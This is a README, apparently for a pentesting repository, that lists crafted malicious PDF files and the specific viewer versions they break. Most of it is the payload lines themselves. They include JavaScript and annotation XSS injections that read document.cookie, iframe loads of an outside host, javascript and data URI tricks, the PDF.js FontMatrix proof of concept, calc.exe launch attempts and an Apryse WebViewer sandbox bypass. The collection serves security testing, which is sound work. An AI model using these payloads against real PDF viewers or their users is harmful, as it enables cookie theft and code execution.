PayloadsAllThePDFs
PDF Files for Pentesting
Install / Use
/learn @luigigubello/PayloadsAllThePDFsREADME
Payloads All The PDFs
<a href="https://twitter.com/intent/follow?screen_name=evaristegal0is"><img src="https://img.shields.io/twitter/follow/evaristegal0is?style=social" alt="Follow @evaristegal0is"></a>
A list of crafted malicious PDF files to test the security of PDF readers and tools.</br>
Write-Up: JavaScript-based PDF Viewers, Cross Site Scripting, and PDF files
Vulnerabilities found
- Foxit PDF SDK For Web 7.5.0 (~600 weekly downloads)
- PDFTron WebViewer 7.2.0, 7.3.1, 8.6.1, 10.1.0, 10.7.2, 10.12.0 (~87k weekly downloads)
- PSPDFKit for Web 2021.4.1 (~13k weekly downloads)
- Syncfusion ej2-pdfviewer 20.2.40 (~6.8k weekly downloads)
- React PDF viewer 3.6.0 (~34k weekly downloads)
- PDF.js 4.1.392 (~2 million weekly downloads)
Payloads list
payload1.pdf
Line 31. Understand if Acrobat Javascript APIs are supported.
/JS (app.alert\(1\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor("document.write('<script>confirm(document.cookie);</script><iframe src=https://14.rs>');"))().next();)
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (data:text/html,<script>alert\(2\);</script>)
Line 177. Try to inject Javascript code using annotations.
<</Type /Annot /Rect [284.7745656638 581.6814031126 308.7745656638 605.6814031126 ] /Subtype /Text /M (D:20210402013803+02'00) /C [1 1 0 ] /Popup 15 0 R /T (\">'><details open ontoggle=confirm\(3\)>) /P 6 0 R /Contents (��^@"^@>^@'^@>^@<^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\(^@'^@X^@S^@S^@'^@\)^@>) >>
payload2.pdf
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (\">'><details open ontoggle=confirm\(2\)>)
payload3.pdf
Line 31. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.
/JS (app.alert\(1\); confirm\(2\); prompt\(document.cookie\); document.write\("<iframe src='https://14.rs'>"\);)
Line 69. Try to run remote commands on Windows.
/URI (file:///C:/Windows/system32/calc.exe)
payload4.pdf
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.openDoc("/C/Windows/System32/calc.exe");)
Line 69. Try to run remote commands on Windows.
/URI (START C:/\Windows/\system32/\calc.exe)
payload5.pdf
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.launchURL\("START C:/\Windows/\system32/\calc.exe", true\); app.launchURL\("javascript:confirm\(3\);", true\);)
Line 69. Try to run arbitrary Javascript abusing the data URI scheme.
/URI (javascript:confirm\(2\);)
payload6.pdf
Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.
/JS (app.alert\(1\); app.launchURL\("/C/Windows/system32/calc.exe", true\); app.launchURL\("'><details open ontoggle=confirm\(3\);", true\);)
payload7.pdf
Line 50. Try to run arbitrary Javascript injected via annotation. It works on vulnerable Apryse PDF Webviewer versions.
/V (">'></div><details/open/ontoggle=confirm(document.cookie)></details>)
payload8.pdf
Line 19. Try to run arbitrary Javascript injected via FontMatrix. It works on vulnerable PDF.js versions. Proof-of-Concept created by Rob Wu and Thomas Rinsma.
<< /BaseFont /SNCSTG+CMBX12 /FontDescriptor 6 0 R /FontMatrix [ 1 2 3 4 5 (1\); alert\('origin: '+window.origin+', pdf url: '+\(window.PDFViewerApplication?window.PDFViewerApplication.url:document.URL\)) ] /Subtype /Type1 /Type /Font >>
payload9.pdf
Line 32. Javascript sandbox bypass in Apryse WebViewer SDK (10.9.x - 10.12.0) to run arbitrary embedded Javascript in PDFs.
/JS (app.alert\(1\); console.println\(delete window\); console.println\(delete confirm\); console.println\(delete document\); window.confirm\(document.cookie\);)
If you want to support me you can offer me a coffee ☕</br></br> <a href="https://www.buymeacoffee.com/gubello" target="_blank"><img src="https://bmc-cdn.nyc3.digitaloceanspaces.com/BMC-button-images/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: auto !important;width: auto !important;" ></a>
Related Skills
node-connect
338.7kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
83.6kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
338.7kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
commit-push-pr
83.6kCommit, push, and open a PR
Security Score
Audited on Mar 24, 2026